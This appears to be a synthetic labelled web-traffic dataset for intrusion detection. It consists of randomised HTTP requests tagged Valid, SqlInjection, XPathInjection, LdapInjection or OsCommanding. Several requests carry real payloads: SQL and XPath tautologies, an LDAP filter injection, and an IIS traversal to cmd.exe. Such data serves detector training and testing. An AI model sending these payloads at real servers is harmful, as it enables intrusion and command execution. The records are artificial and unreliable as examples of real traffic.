ETag: "7EhkgynX9@ojjGSG"
Expect: 100-continue
From: erOso4A0@Obex.be
If-Modified-Since: Thu, 22 Dec 05 17:01:12 GMT
If-Unmodified-Since: Tue, 10 Apr 07 17:02:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3977
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: NTLM ZmVuYzdybzBybWJvcmcwdW9lY1RnZW5lQWhuc3ZyR2RneTVodHRhSG9s
Range: -097697,13-,-7
Referer: http://www.kewheIo.uk/suebb7/la4oi/iest/isqlfrkt.js
TE: trailers,trailers,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 1.0; 1j-rt; rv:6.4.6) Gecko/30156401
UA-CPU: Sparc
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 242x137
Via: 3.2 www.aagrum.png:08611, ti2urh/1.5 115.26.12.0, 2.5 www.0mieW0t.jpeg
Transfer-Encoding: identity
Upgrade: oefTul/8.6, 0Euin/6.0, n5h/9.8, ghe/7.4, n3n48/3.1
Warning: 442 www.azjbyn.gif "uhemezissofcc" "Sun, 09 Sep 07 08:19:07 GMT"
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 4557721
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

tEuretgiDe=Nr7aafe8iAeot&7tn=314&HanOJxz8tP=mr]&h;R@t&Dhmtys=7&aeenylIe=i0so8dhahecihia

End - Id: 4008
Start - Id: 18405
class: Valid
GET /M4fiE9logxLrZy/it9calapst4srpTuret/.processing-instruction-/t_ZZWSigX/lqbJac8LwW4YxOvsDk0U/inzOqaaataotasnjai.css?Ao48Oo=88103008&eNT=05&shbxknnnspwaee=om&ieS=m+tp&XohT6l=ue&elxu4r9uohnf=rfUojz&sattnhe=mseodahfaeuozHy&-7ivai2_=aloretRmo&t4stTes=dh3Ak&3etpg4tnci=f%2Bi%25r%3Fr8e%5Dx%29giANte&ntz6e=67701520&tqrf=29&kirr4Wt=hHG0jnN&xetr=ajo%7Enleaxs HTTP/1.1
Host: www.pbepasA7q.ch
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.5
Accept-Encoding: identity, identity;q=0.8, deflate, gzip;q=0.9, deflate;q=0.3
Accept-Language: hecav-iieo3;q=0.7, mTts38-e;q=0.8, eshobf-e9ro, n-eDn, rq-g
Cache-Control: max-stale
Client-ip: 179.144.176.94
Cookie: rld=[;oroie=70;egaHta=a/;2lsiSrcdonali3n=irEbTeh
Cookie2: $Version="5"
Date: Sun, 25 May 08 08:25:07 GMT
ETag: W/"MgltMTz0K8OY2ncAsiKt"
Expect: vempI=nenndkSg;4fNthXo
From: 1hniea@u4rmt.it
If-Modified-Since: Fri, 11 Sep 09 21:35:50 GMT
If-Unmodified-Since: Fri, 02 Dec 05 17:02:11 GMT
If-Match: *
If-None-Match: "x5qLXaC8MIf@9Av5qVh"
If-Range: Sun, 22 Aug 04 15:25:03 UTC
Max-Forwards: 386
MIME-Version: 9.8
Pragma: Os='bucyy'
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: Digest username="b5d78E00"
Range: -442796,02-1422
Referer: http://7taosT.st/hiapl3Ia.cfm
TE: gzip,trailers,gzip;q=0.8
Trailer: Cache-Control
User-Agent: Mozilla/2.4 (compatible; zetMjvheje; Mac OS X; alDrkch)
UA-CPU: x86
UA-Disp: 882,683,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 342x6218
Via: HTTP/7.4 224.73.187.195, 5.1 www.rlo2ea.js, e6ytla/9.7 161.236.111.196
Transfer-Encoding: gzip
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 382 234.104.119.196 "nOJdiaeAxptcthqErre" 
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 2956272403318008567
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18405
Start - Id: 49039
class: XPathInjection
GET /ejLtz26r.swf?udeAA0tdiIognie=nudesbont5lbvm&enz=fzH&nueurtriae5=tisi&e9taEdt83ru=h7einclude+&taeLairrsvti=ivB3N&Rftirhevo8yew=838&hll0iv=4462&pa0nj08NyhoMloe=w1&npn=lYHs1&Hie0eackler0e=lsa&nd2h=766+or+++1%3C++tqsop%2F2nol%2Far9%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D++++or++91301%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.f2dn5t.net:00357
Connection: seiAZe
Accept: audio/*;q=0.6, audio/*
Accept-Charset: isiri-3342;q=0.1, euc-tw, windows-874;q=0.5
Accept-Encoding: compress, identity, deflate;q=0.6, deflate;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 170.235.72.172
Cookie: tsnxjseeitj=1eEufg<d;ardawhtOvv=2184;B01RMnB8lo=n@_;a6VE=iecabeteN2
Cookie2: $Version="246"
Date: Wed, 14 Jul 04 09:46:16 UTC
ETag: "k-nbkP0EM4jJ4NdD2Z"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 22 Oct 06 24:01:38 GMT
If-Unmodified-Since: Sat, 01 Aug 09 24:58:17 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 13:31:18 CET
Max-Forwards: 895
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: http://oncsjtq.biz/fuiSa/3fze/rhinitef.gz
TE: deflate;q=0.4,trailers,trailers
Trailer: Via
User-Agent: whlp7ua (oatjcC7k3J; nbCvsTH@; 1MA7AVlj; tUxFl2; p1de.-H)
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: identity
Upgrade: sfltc/9.5, Llja/5.6
Warning: 677 1.148.139.109 "EdedporS" "Tue, 26 Jan 10 23:09:25 CET"
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49039
Start - Id: 4510
class: Valid
POST /ethkqo4eeisnet/oKgWoWoZ/sFwW4RacQz4PAQssJ/4TxX4kk4hBXikqL_r/LERTSo7Hf_8/7hoshnetaan6ta/FlcedibeAcrTx.asp? HTTP/1.1
Content-Length: 287
Content-Language: teal,yt
Content-Encoding: compress
Content-Location: /entoi/ukcomu/s9ot7r/eishu/e2lws1.swf
Content-MD5: ZW91U0FvY2VmZWRvZXNubw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 May 05 11:48:47 CET
Last-Modified: Sun, 19 Feb 06 23:01:39 CET
Host: 166.77.227.191
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-7, x-mac-korean;q=0.8, koi8-r;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: ecs-whr;q=0.5, neuke6-n;q=0.7, arGhn-iun6i, hdryfeD-holeeeh;q=0.0
Cache-Control: only-if-cached
Client-ip: 175.142.57.167
Cookie: niialathf=eelraeoUu0;htrbiheaaai=cdivyrb)3Dtlw;nN0h8hhb0bKp=e6jPwrJA_qG;access_logk3ciSTeDELG=283;sytof3=7346974
Cookie2: $Version="195"
Date: Mon, 13 Nov 06 08:56:39 CET
ETag: W/"FmO6gXImXaVVwhaW4p6@"
Expect: eaca
From: de2hc@aRyTe.gov
If-Modified-Since: Sun, 08 Jun 08 24:09:33 GMT
If-Unmodified-Since: Wed, 10 Oct 07 18:56:20 UTC
If-Match: "K6j.AhOLD3bIBxa8V"
If-None-Match: *
If-Range: Thu, 07 May 09 10:52:10 UTC
Max-Forwards: 7
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: d6nso iofjtqph=imodlsXg
Authorization: Basic dnlzbWFsOnRyc25uaHQ=
Range: -81622,-19018,7300-85
Referer: http://www.MbDa.fr/rvaso5i/ssqng/leocz/Eies0w.mp3
TE: deflate;q=0.2,trailers
Trailer: Trailer
User-Agent: Mozilla/5.9 (compatible; Konqueror/9.0; Win98; eeao; tandniigt; aliizi)
UA-CPU: PowerPC
UA-Disp: 9080,142,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 187x310
Via: 2.8 111.109.105.80, HTTP/0.0 www.sft4.png, 5.1 www.7ulq.png
Transfer-Encoding: compress
Upgrade: aensr/9.0, tag/3.6
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 165.210.32.151
X-Serial-Number: 94649830551806
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

htoe=4542728&dIfeetoonelnai=913838&Wsi1zR=>passwdor(&nenOdhHhbeil4k=126009&aneNgnnc=1ONj47&ecle=tDt&7iAfta3nsjlqja=re7i&Ctp4wl6g9w=)ihinh&eyiitxPAen1=464&tqsitrttdb=209294718&SHstdinGxhtpassgVk= &s1not=iw82Xnsz5m&xtax2aoI=Eea1zshutdown&ae6rtWenebnnrtl=epasswdobjecto&Etc2nnt=008310

End - Id: 4510
Start - Id: 36973
class: LdapInjection
GET /bsfyht87to/dedao/eo0stte07sjOs/iVR5IA7iwTNyZ_-L/beeukptAif1irO8tR/dPL..r8oI7m_QHXPpP4s/AzzxWt/ruh/2O7pXJW4M.swf?idnedeFIia9a=26&tnateoo=l%3Cand&uotaut5=1etwe8RhRF2&ZHxIG6Z=7111&tzuqk=g+awDr%5Clwfe&7etdirekhtehoiX=305&iaere8ctaueg2au=052%29%28%26%28objectClass%3Douw%29%28%7C%28sn+%3D+otx%29%28cn%3Dle+J*%29%29&aA5tnbea=75&ti6t=3&sNh=4xGnJ5NGc.L-&script4BVQfqWSL=1778956&wgoefPrtsohdr=itDWG HTTP/1.1
Host: www.r0rvm.fr:11784
Connection: ide9ta
Accept: text/plain;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.1, compress
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 227.89.168.60
Cookie: s5sess1yhoteh=h_7Usfd2
Cookie2: $Version="595"
Date: Sat, 10 Jul 04 17:06:36 GMT
ETag: W/"VpqkoxnhAIdojfgzAUw"
Expect: ss5nnhar=Ibtoee;tsmh
From: fipt@jjMrleib1.biz
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Mon, 15 May 06 10:42:22 GMT
If-Match: *
If-None-Match: "b81RCllo4JeISay"
If-Range: Wed, 27 Oct 04 05:50:12 GMT
Max-Forwards: 485
MIME-Version: 3.4
Pragma: 8iEremht='tooy'
Proxy-Authorization: Basic aGlsTmUwOmxzdG9zZmU=
Authorization: nertct ihrdp=xtodlihe
Range: 84-,-422477,1197-5319
Referer: /dad4/te1eenA.asmx
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (Windows; U; WinNT 9.6; or-ot; rv:6.2.7) Gecko/50425129
UA-CPU: StrongARM
UA-Disp: 2036,1499,8
UA-Color: color8
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: compress
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36973
Start - Id: 42002
class: SqlInjection
GET /csMspu1cnehbbey/gAiLotbmnehrI/6oE6son9bxMeircvfa/jvJ8W.js?hllbr8n=Mst&3frshndo3farb0f=dlhome%26tNwGOs9s&Eei3f7iy19lygjn=5171&iwety7a=i4aae&deepHHerNeaWa=4761882&Zlxqn=6798076&rmt7ondtfai=193201&7UuuSnome=49tF4mcw3DCD&bTKlocationvpO=s%7Ee+rilnrnbvahuN&udkdunmEtnsl=iTzg5c&Dz3VfIlL5M=%27+OR+++++%27%27+%3D++%27&gyxlei=128281174&1layeyideil=%3Eatexec HTTP/1.1
Host: 8.245.78.159
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-10646-ucs-2;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=4
Client-ip: 134.245.214.117
Cookie: ginputwherelN=d;crien5o=9728037;n3irqswo1tcwei=tbmuy5
Cookie2: $Version="554"
Date: Tue, 28 Feb 06 12:23:14 UTC
ETag: W/"AqtjD4adzuX_j42H-Zsa"
Expect: ns3gzos
From: wXro@erouh.com
If-Modified-Since: Tue, 29 Sep 09 07:21:06 UTC
If-Unmodified-Since: Sun, 06 Aug 06 17:00:12 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Dec 04 05:32:52 CET
Max-Forwards: 539
MIME-Version: 6.9
Pragma: syoc7=o5
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest qop=auth
Range: -728027,84041-8,736156-
Referer: /3qesdrke/delFede/opetretl.css
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/9.4 (compatible; Tdn6Ofa; Unix; 4rsflNana; rsaoaiL)
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0057x268
Via: 3.7 231.241.184.146:8957, 8.3 221.60.38.0
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 227.242.186.30
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42002
Start - Id: 10347
class: Valid
GET /lrE3Wt.php3?avnoNCensjetae=lle%3E6zilr%263wd%2Fprocessing-instructionara%3Cm&lee=i1C&pEo1ohhSmtm=tocubehfqo&et=567&9smucefodsdatAg=+etcnhc8zt&agw=zdrwnpmiietci&oth1=3043241&0RH7yB=20&htmd=21 HTTP/1.1
Host: www.a8odecscce.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=405
Client-ip: 184.240.10.145
Cookie: sts5ncrieeIb=a9vnr vd@
Cookie2: $Version="66"
Date: Mon, 31 Jan 05 18:14:41 GMT
ETag: W/"QQwp@Wz-Q9O@yWi"
Expect: 100-continue
From: foniz@txtCtS.de
If-Modified-Since: Fri, 20 Nov 09 10:39:17 CET
If-Unmodified-Since: Fri, 29 Feb 08 24:22:40 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Jan 07 12:17:24 CET
Max-Forwards: 73
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRjVEFycjZ0bmNucmxObmhhRUlsaW5idWFJdGl6ZWhuYmU5
Authorization: Digest nonce
Range: -904
Referer: /lerN2/ed3bjujd/qeisqexs/aAnoosa.js
TE: chunked
Trailer: Pragma
User-Agent: moYAInHaxv http://www.a1hiaIn.biz
UA-CPU: PowerPC
UA-Disp: 6878,6182,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: 1.3 146.185.191.84:32, 8.2 www.aoz9ybtp.html
Transfer-Encoding: gzip
Upgrade: net/2.1
Warning: 895 www.iAhlp.jpeg "3wiacAbedi7t" 
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10347
Start - Id: 43723
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.moausxnrpa.fr:70
Connection: close
Accept: image/*, video/mpeg;q=0.9
Accept-Charset: cp-936, ks_c_5601-1987, x-mac-turkish, x-mac-icelandic;q=0.3, us-ascii
Accept-Encoding: compress;q=0.0, compress, identity, identity
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 183.153.88.199
Cookie: tzddhpp7onteean=rg;eaoN1tdlh=75;@sY11bfck2GZ=eaeagp9ureaccepth;2tinqplqiTel=2116;bduMtt6ostG=ilwmh
Cookie2: $Version="378"
Date: Thu, 26 Aug 04 08:05:45 CET
ETag: W/"3BJWUYYJ2ACJTUS@l"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Mon, 26 Jan 09 15:58:05 GMT
If-Unmodified-Since: Wed, 29 Jul 09 14:18:41 GMT
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: *
If-Range: Wed, 20 Jan 10 14:21:11 CET
Max-Forwards: 224
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aXp0aTphM3RMaXJ0
Range: 7008-71
Referer: /Gihhi/yttO/okz7w/tttteiIe.sh
TE: chunked,deflate,trailers
User-Agent: aD8TRKVg http://www.s3radk.org
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 284x7393
Via: FTP/5.3 19.35.215.57
Transfer-Encoding: gzip
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 251.245.152.34
X-Serial-Number: 601406
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43723
Start - Id: 35167
class: SqlInjection
GET /e3e7H.shtml?mmHEooda=%7El6ms8hni+%292oot&odoon0j7=eae-%40erj%27ruuad%7C%2FfL%3A&mvuAron3nLvhtoi=aG2&mqtuetyadrouiOc=OR+++%27ar%27++%3D+++++N%27+++++%27&earD=pe-saa&srr4telt=klie&a64=5361&ieaows=832957&1o=ogW0&vs7@-axuhtpass63a=acdhhhassbeluch&t5iaRb=oogJtybm3&le=c%3Cerlaz&xmqpSeht=b%40yu8&crIbiwLcsiFayr=3066&yiee=d7evte+ew6aei+r HTTP/1.0
Host: 217.143.29.165
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip;q=0.6, identity;q=0.2, identity
Accept-Language: at-no, 89zfs-E;q=0.3, pmFm-caex
Cache-Control: no-store
Client-ip: 86.6.34.68
Cookie: bhatTchgtrryedM=ax4eqesr9Rw;Km6KoQJ=esLilyDect;eTkm72hrs=82118
Cookie2: $Version="98"
Date: Fri, 25 Aug 06 19:05:52 CET
ETag: "yVk20OLqWyt55fRiFtBZ"
If-Modified-Since: Sun, 11 Apr 04 18:41:59 CET
If-None-Match: *
Max-Forwards: 02
Proxy-Authorization: Digest realm
Range: 97412-
Referer: /u2chs/3o1sT.ace
User-Agent: gond/4.9.5
Via: 7.8 144.58.131.193, HTTP/9.1 www.eaort.htm, FTP/5.1 www.oehn.htm
Transfer-Encoding: deflate

null

End - Id: 35167
Start - Id: 1832
class: Valid
GET /mllDiema4unsptubssv/p2ci/exVhF4/iLa6SswJ/ee7wn6etb/cCq-F4eHzoNE/om0_g/x2K@mvarbodya/PiaawtaOhnrctsODnone.js?w9s4retsUac=%27ha+&EssICRc=nHiK_D%40Xpo&dnAechhd7ptt2=Goyr&3Lmocha3ZNprocessing-instruction=bin%7C4eE4r%3D&m0Aisshsn=ge%3B&ar93erNactn7a5R=372507&iminr4ne2swi0vn=604830&noc=72296&t7awAoeiaUlhhO=95963&8winnt.GkG@8diupdate3=sock_stream&eetsw6ngo=oie HTTP/1.1
Host: www.ceyin.ch:76
Connection: hnwnns
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.2
Accept-Encoding: *
Accept-Language: luaaa3hg-inne, iin-1itahee;q=0.4, eenotY-dsseeat;q=0.1, hrdac-uwtri, na6Yi-hdtyw
Cache-Control: no-store
Client-ip: 211.115.143.28
Cookie: 3at=7oaSlHriaq;TVs=nttaUdr;nwsm7n=iCeYelhecd;qee=osesilrisoas3ze;JquvwKOshttpdG1=80243640;phib0utc=A9sssam
Cookie2: $Version="8"
Date: Mon, 17 Oct 05 16:52:51 CET
ETag: W/"o2dpEeATld.pcg2"
Expect: asReiisa=mLvton2a
From: etiimsr@2ilc8.de
If-Modified-Since: Sat, 29 Nov 08 16:57:06 GMT
If-Unmodified-Since: Sun, 20 Nov 05 03:55:33 UTC
If-Match: "jjMrO-lcIbpIloHXmcHV"
If-None-Match: "g09ckzPwhLUyF@SB6"
If-Range: "8DTy-_5229-W8pexUo"
Max-Forwards: 56
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM cnpvZmg1bnRzYWc4aG5jYm9ucnR0bWdjY2g4b3pqa29yMURTcGVyZW1k
Authorization: Basic YW9iZWk6YWVlZUR0
Range: -1402,47341-
Referer: http://spsml.fr/acod/cetCtaad/rnsc9l/vDtno.mpeg
TE: gzip
Trailer: Warning
User-Agent: smSsbra05/2.5
UA-CPU: x86
UA-Disp: 0564,279,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 289x684
Via: FTP/3.6 www.na5y.html
Transfer-Encoding: compress
Upgrade: mntn/9.1, 8tme/6.2, rRoA/2.8, jle/4.8
Warning: 268 91.131.82.229:319 "dwbDioteoTyaucekt8" "Fri, 17 Apr 09 05:59:40 GMT"
X-Forwarded-For: 22.125.3.165
X-Serial-Number: 0392549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1832
Start - Id: 19320
class: Valid
GET /ihymk/hl0fft.dll?3eaeqEtkSa=70&Totds9nd=n&7ebstthanenfA=23309695&aaau=od%29am3%7Carf%2B&ltiespeusr=66&uenuiecaTvEh3=%2Bm%27m+%3Baufe HTTP/1.0
Host: 175.200.1.141
Connection: close
Accept: text/html, image/gif
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, identity, compress
Accept-Language: *
Cache-Control: rxk=m
Client-ip: 151.70.203.20
Cookie: ngqd9iru6tlall=5927223313;se=10408;IGcxp_S=ee
Cookie2: $Version="7"
Date: Thu, 12 Mar 09 02:15:23 CET
ETag: W/"IcfyD2NOXsM1dVnare"
Expect: 100-continue
From: ab7O@nnwAe.gov
If-Modified-Since: Sat, 01 Apr 06 18:38:29 UTC
If-Unmodified-Since: Tue, 07 Jun 05 01:32:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 340
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM b25pYXJlaXRpbGMwbmNkdnRzb2Fjc2RvNml0bWlSZXNobGxsaWVkSHBuaQ==
Authorization: Digest response="1d094E45CdDCBBEef9444A61Cb98b0F2"
Range: 32-,34539-5523,215-7
Referer: http://taostc.fr/amaycane/n1eer3/tdecsaas/sva6.sh
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 1.3; ht-o6; rv:0.5.3) Gecko/65814572
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5443x8172
Via: 6.7 228.133.224.149:0, HTTP/4.0 www.etaxayud.jpg
Transfer-Encoding: tonwpe; mueoc=dDudmU5
Upgrade: sahcq/0.1
Warning: 333 161.38.217.77 "ytiqpMa5" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19320
Start - Id: 31247
class: Valid
GET /QTVbvEKXcmd/mlZ9nph-f6e9K0/qzkvd6Xs-0XkDT4ap1U/eS-mMBl/zB/J2TEdDdtmpKcmd/0XDh8j5EY8oPW7WE4sms/Pci3Eatirh2vrnlOS/M58rb79yh1IZimgr/Jecho81b5EO/d5M@3fgT_Lm.php3?uoy6tt7soAo2d=17448328&a2OeohtiiEb8it=pdbyN&tvaEs9rrs7=u8si+fr0dxriy&fnehySRel=oVCQ&execlikegVT.cx8.N=hFSzLNl&icHutsosd=83&li1nt5dphe=%7Eph&HN6TI=Syeyhee%2F&aetnn18tsor=r9znoaoSm&om=12174509&ai=realheocugeev&os8rnoe=0JGVta_E203y&frLcee=9463&ctalaoom7Re=heaomwdt HTTP/1.1
Host: 90.191.38.56
Connection: ttbqlt
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rr-sgo6;q=0.0, ceiuoei-ei
Cache-Control: no-cache
Client-ip: 203.100.137.251
Cookie: R%u7mLni=926447;eurbinmeot9d=lisniszfhnn9d;nmr1ocehabmTat=48sofajeooe
Cookie2: $Version="28"
Date: Thu, 06 Oct 05 04:28:20 CET
ETag: "dX63Qs_s@JrSd_v_W"
Expect: 100-continue
From: ettihl@s2tpbthdps.com
If-Modified-Since: Fri, 22 Aug 08 07:33:36 GMT
If-Unmodified-Since: Sat, 27 Jan 07 11:12:35 CET
If-Match: "elW59T@SC4VeLOeTfS"
If-None-Match: *
If-Range: "6am13tziAX5yo.1N"
Max-Forwards: 5
MIME-Version: 4.9
Pragma: viaQCQi=ier6e
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: Basic d3RnZUF0OjRNaW9xeXBl
Range: 835058-581
Referer: /ufhalys/Oqamxdmk/ecNet/rkhewra.jsp
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: a8Fmq28NN http://www.9aoUo9.biz
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3795x126
Via: 2.7 102.214.73.244:06708, FTP/4.6 www.aduChitd.html, FTP/2.2 www.o4reyhcp.html
Transfer-Encoding: deflate
Upgrade: jilg/6.7, vNuli/1.7, 3ea/3.2, eNa/1.0
Warning: 221 www.O4or.jpeg "kaaoteuyfsaeeehare1" "Wed, 30 Mar 05 17:25:44 GMT"
X-Forwarded-For: 61.148.92.144
X-Serial-Number: 65900782326
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31247
Start - Id: 30832
class: Valid
GET /IS_5WEXjJm/iNeho29xoIooCUstt/eBt1iMq/lrOUs3fXxxK/r_ucOL@h/52Ops6ki.aspx?ezlfirstssEeile=ox&narrwiDtrU3rlI=idxe HTTP/1.0
Host: 173.131.174.249
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=58
Client-ip: 63.78.197.96
Cookie: 4iysrorUqunrtKg=3si;PkEmz@=gmiB(h;5taohjlocrsaddr=8.7_AAI0WWK;rocri7nS=98039;rrasfhsUR=esl1iktdgn74oAMte
Cookie2: $Version="369"
Date: Mon, 04 Jan 10 03:19:04 GMT
ETag: W/"woMjTGCwWRMsMt9g"
Expect: 6iqY1
From: emai@qjb6cGS.org
If-Modified-Since: Tue, 15 Sep 09 17:19:53 CET
If-Unmodified-Since: Mon, 25 Jun 07 13:26:26 UTC
If-Match: *
If-None-Match: *
If-Range: "pAHD8kwxZANWWXQI3."
Max-Forwards: 3
MIME-Version: 8.2
Pragma: ibEaoAx=erncsit
Proxy-Authorization: Bb9d hdnpTo6=rnIfs
Authorization: aayd aol7=coi8o1m0
Range: 926-,0-
Referer: /nfsnEieh/afle/ane1.mdb
TE: trailers,trailers,gzip;q=0.7
Trailer: Connection
User-Agent: Mozilla/3.9 (X11; U; Unix 8.9; sr-al; rv:1.0.8) Gecko/72686675
UA-CPU: MIPS
UA-Disp: 072,6639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8282x452
Via: 5.6 62.72.4.250
Transfer-Encoding: compress
Upgrade: i1dhw/0.5, 7nnt/5.7
Warning: 487 www.3aeuzssp.html "5daxrei" "Sat, 28 Apr 07 04:33:31 UTC"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 940026202382470481
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 30832
Start - Id: 48981
class: XPathInjection
GET /odhdeaneagaatuh9i/nXhcEro_j7H/Fc.bk/ltiulnserhh.aspx?gTfua=rme%27+++or++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+++i++%2Bj++%2B+++k+++%2B++l++%2B+++1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27sb%27%3D++++%27+++++os%27+or&tia=4dzvawstea++%26Ea&at4So9ctpC=i0%5DRewe HTTP/1.1
Host: www.toe9neX.biz
Connection: waain
Accept: audio/*;q=0.8, video/*;q=0.7, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: noornstN-n;q=0.5, ae-if7i;q=0.0
Cache-Control: min-fresh=9
Client-ip: 229.60.106.220
Cookie: dlesOasCoot=o@S
Cookie2: $Version="9"
Date: Sat, 18 Oct 08 21:52:39 UTC
ETag: "vGSzgvoNm.TJx8i"
Expect: ebadstio=eieer;lortft=nnt7Te
From: 6icshpO@RtgPShLon.org
If-Modified-Since: Thu, 04 Sep 08 11:52:21 CET
If-Unmodified-Since: Sat, 21 Feb 04 06:33:42 GMT
If-Match: *
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: "CGu19_3Px1FMCkUCO1"
Max-Forwards: 56
MIME-Version: 7.4
Pragma: no-cache
